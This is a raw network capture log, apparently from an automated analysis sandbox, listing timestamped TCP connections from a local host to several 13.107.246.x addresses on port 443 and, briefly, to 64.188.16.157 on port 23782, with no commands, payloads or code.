                                                                                Oct 4, 2024 11:34:07.832920074 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.832948923 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.848918915 CEST4435550013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.848993063 CEST4435550013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.849056959 CEST55500443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.849323034 CEST55500443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.849347115 CEST4435550013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.849360943 CEST55500443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.849376917 CEST4435550013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.852536917 CEST55517443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.852582932 CEST4435551713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.852679968 CEST55517443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.860018969 CEST55517443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.860038042 CEST4435551713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.863395929 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.866496086 CEST4435549913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.866663933 CEST4435549913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.866727114 CEST55499443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.866821051 CEST55499443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.866833925 CEST4435549913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.866843939 CEST55499443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.866847992 CEST4435549913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.870268106 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.870281935 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.873511076 CEST55518443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.873526096 CEST4435551813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.873645067 CEST55518443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.875044107 CEST55518443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.875056028 CEST4435551813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.876755953 CEST4435550113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.876941919 CEST4435550113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.877012968 CEST55501443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.877140999 CEST55501443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.877161980 CEST4435550113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.877173901 CEST55501443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.877180099 CEST4435550113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.881230116 CEST55519443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.881268024 CEST4435551913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.881331921 CEST55519443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.881500959 CEST55519443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.881516933 CEST4435551913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.920986891 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.921026945 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.921046019 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.921089888 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.921094894 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.921113014 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.921139956 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.921154022 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.921165943 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:07.921178102 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.921195030 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:07.922863960 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.922902107 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.922960997 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.922966957 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.922983885 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.922991991 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.923015118 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.923059940 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.923059940 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.925110102 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.925132990 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.925173998 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.925185919 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.925211906 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.925214052 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.925234079 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.925240993 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.925271988 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.925808907 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.925892115 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.925898075 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.925966978 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.925976038 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:07.926094055 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.950067997 CEST55497443192.168.2.513.107.246.45
                                                                                Oct 4, 2024 11:34:07.950086117 CEST4435549713.107.246.45192.168.2.5
                                                                                Oct 4, 2024 11:34:08.005873919 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.005911112 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.005948067 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.005960941 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:08.005971909 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.006011009 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:08.007859945 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.007882118 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.007915974 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:08.007927895 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.007946968 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:08.007947922 CEST55502443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:08.007972956 CEST4435550213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.190236092 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.190274954 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.190361023 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.190462112 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.190474987 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.356784105 CEST4434971023.1.237.91192.168.2.5
                                                                                Oct 4, 2024 11:34:10.356856108 CEST49710443192.168.2.523.1.237.91
                                                                                Oct 4, 2024 11:34:10.827302933 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.831060886 CEST4435553713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.831446886 CEST55540443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.831486940 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.832004070 CEST55540443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.832020044 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.832766056 CEST55537443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.832803011 CEST4435553713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.833292007 CEST55537443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.833298922 CEST4435553713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.838820934 CEST4435553913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.842993975 CEST55539443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.843014956 CEST4435553913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.843451023 CEST55539443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.843460083 CEST4435553913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.843611002 CEST4435553813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.843931913 CEST55538443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.843950987 CEST4435553813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.844479084 CEST55538443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.844485998 CEST4435553813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.852911949 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.853233099 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.853266001 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.853749037 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.853754997 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.930876017 CEST4435553713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.931037903 CEST4435553713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.931107998 CEST55537443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.932202101 CEST55537443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.932202101 CEST55537443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.932224989 CEST4435553713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.932238102 CEST4435553713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.934683084 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.934861898 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.934923887 CEST55540443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.934948921 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.934983015 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.935031891 CEST55540443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.938899994 CEST55540443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.938915014 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.938926935 CEST55540443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.938932896 CEST4435554013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.941102982 CEST4435553913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.941369057 CEST4435553913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.941428900 CEST55539443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.943480968 CEST4435553813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.943643093 CEST4435553813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.943912029 CEST55538443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.961097956 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.961824894 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.961921930 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.990025997 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.990060091 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.990129948 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.994009018 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.994023085 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.994972944 CEST55539443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.994993925 CEST4435553913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:10.995006084 CEST55539443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:10.995012045 CEST4435553913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.004633904 CEST55538443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.004671097 CEST4435553813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.004682064 CEST55538443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.004688025 CEST4435553813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.006757975 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.006757975 CEST55541443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.006771088 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.006781101 CEST4435554113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.011081934 CEST55548443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.011111021 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.011228085 CEST55548443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.016819000 CEST55548443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.016830921 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.018295050 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.018336058 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.018398046 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.018515110 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.018529892 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.019984961 CEST55551443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.019993067 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.020051956 CEST55551443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.020603895 CEST55551443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.020623922 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.021333933 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.021363020 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.021418095 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.021506071 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.021513939 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.607410908 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.624154091 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.624180079 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.624923944 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.624929905 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.872682095 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.872714996 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.872767925 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.872776985 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.872819901 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.879515886 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.881614923 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.882510900 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.884253979 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.891827106 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.891859055 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.892712116 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.892719984 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.892890930 CEST55547443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.892915964 CEST4435554713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.895108938 CEST55551443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.895133018 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.895467043 CEST55551443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.895472050 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.895806074 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.895833015 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.895982027 CEST55548443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.895998001 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.896291971 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.896298885 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.896719933 CEST55548443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.896724939 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.972275019 CEST55557443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.972320080 CEST4435555713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.972434044 CEST55557443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.990403891 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.990686893 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.990782022 CEST55551443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.990855932 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.991235971 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.991297960 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.993016958 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.993077993 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.993133068 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.993141890 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.993155003 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.993232012 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:11.997518063 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.997654915 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:11.998003006 CEST55548443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.246654987 CEST55557443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.246679068 CEST4435555713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.246947050 CEST55548443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.246963978 CEST4435554813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.257400990 CEST55551443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.257411003 CEST4435555113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.258970976 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.259006023 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.259042025 CEST55550443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.259053946 CEST4435555013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.259804010 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.259816885 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.259829044 CEST55552443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.259834051 CEST4435555213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.265461922 CEST55562443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.265502930 CEST4435556213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.265562057 CEST55562443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.265734911 CEST55562443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.265748024 CEST4435556213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.267759085 CEST55563443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.267788887 CEST4435556313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.268066883 CEST55563443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.270407915 CEST55564443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.270442009 CEST4435556413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.270525932 CEST55564443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.270803928 CEST55564443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.270817995 CEST4435556413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.272428036 CEST55563443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.272458076 CEST4435556313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.318944931 CEST55566443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.318999052 CEST4435556613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:12.319123983 CEST55566443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.319504976 CEST55566443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:12.319518089 CEST4435556613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:13.087080956 CEST4435556213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:13.087389946 CEST4435556413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:13.088051081 CEST55564443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:13.088093996 CEST4435556413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:13.088634968 CEST55562443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:13.088671923 CEST4435556213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:13.088766098 CEST4435555713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:13.089035988 CEST55562443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:13.089042902 CEST4435556213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:13.089574099 CEST55564443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.277995110 CEST4435559313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.278187990 CEST55591443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.278227091 CEST4435559113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.278649092 CEST55592443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.278676033 CEST4435559213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.396960974 CEST5559423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:34:15.401858091 CEST237825559464.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:34:15.401937962 CEST5559423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:34:15.406377077 CEST5559423782192.168.2.564.188.16.157
                                                                                Oct 4, 2024 11:34:15.411278963 CEST237825559464.188.16.157192.168.2.5
                                                                                Oct 4, 2024 11:34:15.563812971 CEST4435558413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.564335108 CEST55584443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.564359903 CEST4435558413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.564842939 CEST55584443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.564847946 CEST4435558413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.670126915 CEST4435558413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.670263052 CEST4435558413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.670317888 CEST55584443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.672769070 CEST55584443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.672792912 CEST4435558413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.672805071 CEST55584443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.672811031 CEST4435558413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.677723885 CEST55599443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.677772045 CEST4435559913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.678050995 CEST55599443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.678308964 CEST55599443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.678324938 CEST4435559913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.852931976 CEST4435559013.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:15.853147984 CEST55590443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:15.853162050 CEST4435559013.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:15.853652954 CEST4435559013.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:15.853961945 CEST55590443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:15.854058981 CEST4435559013.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:15.889118910 CEST4435558913.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:15.889460087 CEST55589443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:15.889487982 CEST4435558913.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:15.889842033 CEST4435558913.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:15.890183926 CEST55589443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:15.890254974 CEST4435558913.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:15.911526918 CEST4435558613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.913252115 CEST55586443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.913284063 CEST4435558613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.913734913 CEST55586443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.913742065 CEST4435558613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.922303915 CEST55590443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:15.925669909 CEST4435559313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.926140070 CEST55593443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:15.926182032 CEST4435559313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:15.926723003 CEST55593443192.168.2.513.107.246.60
